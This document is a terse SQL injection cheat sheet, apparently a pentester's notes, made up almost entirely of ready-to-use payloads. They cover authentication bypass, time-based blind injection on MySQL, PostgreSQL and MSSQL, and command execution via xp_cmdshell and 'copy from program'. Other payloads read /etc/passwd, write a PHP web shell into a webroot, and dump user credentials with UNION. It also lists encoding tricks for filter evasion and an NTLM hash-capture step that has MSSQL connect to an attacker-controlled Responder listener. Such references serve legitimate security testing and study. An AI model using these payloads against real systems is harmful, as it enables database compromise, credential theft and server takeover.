SQLi/DB
Basics
1 OR 1=1-- -
1' OR 1=1-- -
admin'-- -
Time Based
# MySQL
1' AND (select SLEEP(5))-- -
# PostgreSQL
1';SELECT PG_SLEEP(5)-- -
1' AND 1=(select 1 from PG_SLEEP(5))-- -
1';CREATE TABLE hack(a text);copy hack from program 'sleep 10';DROP TABLE IF EXISTS hack;-- -
# MSSQL
1' WAITFOR DELAY '0:0:10'-- -
1';WAITFOR DELAY '0:0:10'-- -
1'; EXEC sp_configure 'show advanced options', 1 ; EXEC sp_configure 'xp_cmdshell', 1 ; RECONFIGURE ; EXEC xp_cmdshell 'ping 192.0.2.1 -n 1 -w 10000' -- -
1'; EXEC sp_configure 'show advanced options', 1 ; EXEC sp_configure 'xp_cmdshell', 1 ; RECONFIGURE ; EXEC xp_cmdshell 'powershell -c "Start-Sleep -Seconds 10"' -- -
Read/Write
# MySQL
select load_file('/etc/passwd');
select '<?php echo 1;?>' into OUTFILE '/var/www/html/test.php'
" UNION SELECT NULL,NULL,'<?=`$_GET[0]`?>' into outfile 'C:\\xampp\\htdocs\\site1\\src\\test2.php' --
Union
1' Union Select 'aaa','bbb','ccc','ddd','eee' -- -
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT 'abc',NULL,NULL--
' UNION SELECT username, password FROM users--
' UNION SELECT NULL,username||'~'||password FROM users--
# MySQL
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
XML Encoding
You can convert chars to xml references such as numerical or hexadecimal values
# Hex
echo -n 's' | xxd -plain | sed 's/\(..\)/\&#x\1;/g'
echo -n 's' | python3 -c 'import sys;[print(f"&#x{ord(char):x};",end="") for char in sys.stdin.read()]'
# Dec
echo -n 's' | python3 -c 'import sys;[print(f"&#{ord(char)};",end="") for char in sys.stdin.read()]'
# Example: s == s == s
Payload example
1 union select NULL
MSSQL
# Version
SELECT @@version
# Perms
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
# DBs
SELECT name FROM master.sys.databases
# Tables
SELECT * FROM myamazingdb.INFORMATION_SCHEMA.TABLES
NTLM
You can try to trigger a connection and crack NTLMv2
# List folders
EXEC master.sys.xp_dirtree '\',1,1;
# If it works, then you can try to trigger a connection.
# First listen with responder
sudo python3 /opt/Responder/Responder.py -I tun0 -w
# Then call responder from MSSQL
EXEC master.sys.xp_dirtree '\\10.10.14.139\beepboop',1,1;